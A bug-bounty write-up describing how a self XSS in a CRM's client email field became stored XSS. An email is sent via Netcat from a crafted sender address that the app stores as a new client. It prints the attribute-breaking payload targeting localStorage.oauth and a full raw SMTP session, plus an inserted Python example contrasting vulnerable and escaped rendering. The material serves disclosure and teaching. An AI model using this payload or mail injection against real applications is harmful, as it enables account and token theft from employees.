What do Netcat, SMTP and self XSS have in common? Stored XSS

Plenum
Jul 16, 2019 · 2 min read

If you are reading this, you are probably wondering what this is. Is it some kind of joke? The answer is no, and it is not clickbait either: this is the story of chaining small issues and pivoting from a self XSS to a fully blown stored XSS.


The journey began when I started hacking on a private program. While doing my research I came across a self XSS issue which they were aware of and which was explicitly out of scope. So I kept digging and started to learn how the app worked: it had a CRM and other related features which are not really important for now. The app had multiple parts, and one of them was client management, with the usual functionality such as create/delete/modify clients and create/attach invoices. The self XSS lived in the information fields of the client's view, where the client's email address was rendered into a link like this:

<a tlclick="sendEmail(&quot;email_here&quot;)">email_here</a>

By adding a single ' to the email address I was able to break out of the attribute and add my own attributes to the tag.
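
To make the injection concrete, here is an added example (not code from the write-up or from the affected app) that renders a client's email address the way the page describes and the way it should be done. It assumes the original template was an inline event handler inside a single-quoted attribute, since that is what a lone ' breaks out of; the attribute name in the page's snippet is not a real handler, so the example uses onclick. Both renderings are fed through Python's html.parser to show that the write-up's payload becomes a live onmouseover handler in the first and stays an inert attribute value in the second.

```python
import html
from html.parser import HTMLParser

# Added example; not the write-up's code nor the affected application's.
# Payload exactly as it appears in the write-up. '(' and ')' are written as
# numeric character references because bare parentheses are not legal in an
# SMTP local-part; the browser decodes them once they sit in an attribute value.
PAYLOAD = "'onmouseover='alert&#40localStorage.oauth&#41'@plenumsec.com"

def render_vulnerable(email):
    """Assumed shape of the original template: the raw e-mail address dropped into
    a JS string inside a single-quoted inline handler (onclick is an assumption;
    the page's snippet does not show a real handler name)."""
    return f"<a onclick='sendEmail(\"{email}\")'>{email}</a>"

def render_hardened(email):
    """Encode for the HTML attribute/text context and keep the value out of any
    script context: a data- attribute that a separate script reads on click."""
    safe = html.escape(email, quote=True)      # also turns ' into &#x27;
    return f'<a class="client-email" data-email="{safe}">{safe}</a>'

class AttrCollector(HTMLParser):
    """Collects every (name, value) attribute the parser sees on start tags."""
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)

def attributes(markup):
    """All attributes (entity-decoded) a tolerant HTML parser extracts from markup."""
    p = AttrCollector()
    p.feed(markup)
    p.close()
    return p.attrs

def event_handlers(markup):
    """The on* attributes a browser would wire up for this markup."""
    return [(n, v) for n, v in attributes(markup) if n.startswith("on")]

if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        markup = render(PAYLOAD)
        print(label, markup)
        print("  handlers:", event_handlers(markup))
```

Note that html.escape alone would not have been enough for the original template: the address sits in two contexts at once (a JS string literal inside an HTML attribute), so a " in the address would survive attribute decoding and break the JS string. That is why the hardened version keeps the value in a data- attribute and out of script entirely.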

After some more digging I found out that if you send an email to the invoice email address, the app checks whether the sender's address exists in the client database and, if it does, creates a new ticket for that client. But what if we send an email from a non-client address? A new client is created along with the new ticket, with the sender's address stored as the client's email.

Now, since I could control part of the client information (the email address), I needed to be able to send really malformed emails, and the easiest way to do that is with Netcat. So I opened a new terminal, looked up their mail server (its MX record) and started building the exploit.

First I had to build a working XSS, then I had to figure out which characters break the SMTP address syntax and encode them. I ended up with an address like this:

'onmouseover='alert&#40localStorage.oauth&#41'@plenumsec.com

The characters that break SMTP here are the space and the parentheses: none of them is legal in an unquoted local-part, and neither is ;, so ( and ) become the numeric character references &#40 and &#41 with no trailing semicolon. The browser still decodes them once the value is rendered into an attribute, and HTML parsers accept a new attribute immediately after a closing quote, so the payload needs no whitespace at all. The final attack looked something like this (-C makes Netcat send CRLF line endings, which SMTP requires):

nc -C mxa.mailgun.org 25
>HELO plenumsec.com
>MAIL FROM: <'onmouseover='alert&#40localStorage.oauth&#41'@plenumsec.com>
>RCPT TO: <random@target.com>
>DATA
From: Attacker <'onmouseover='alert&#40localStorage.oauth&#41'@plenumsec.com>
To: Victim <random@target.com>
Subject: Urgent
Date: Wed, 26 Sep 2018 14:21:26 -0400

Hello,
This is a stored xss poc.
Goodbye.
.
>QUIT

Now an attacker would just wait for an employee to visit the client management page or perform any action that renders the attacker's email address. The company's email address was completely guessable, so the whole process could be automated and brute-forced.

One could argue that SPF would have prevented this, but it would not have on its own: the attacker controls the sending domain (plenumsec.com) and can publish whatever SPF record suits them. What actually closes the hole is validating the sender address before a client record is auto-created from inbound mail, and HTML-encoding it wherever it is rendered. Sometimes security is not convenient for businesses, though, so they make compromises.

Thanks for reading,

Regards, Plenum

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew
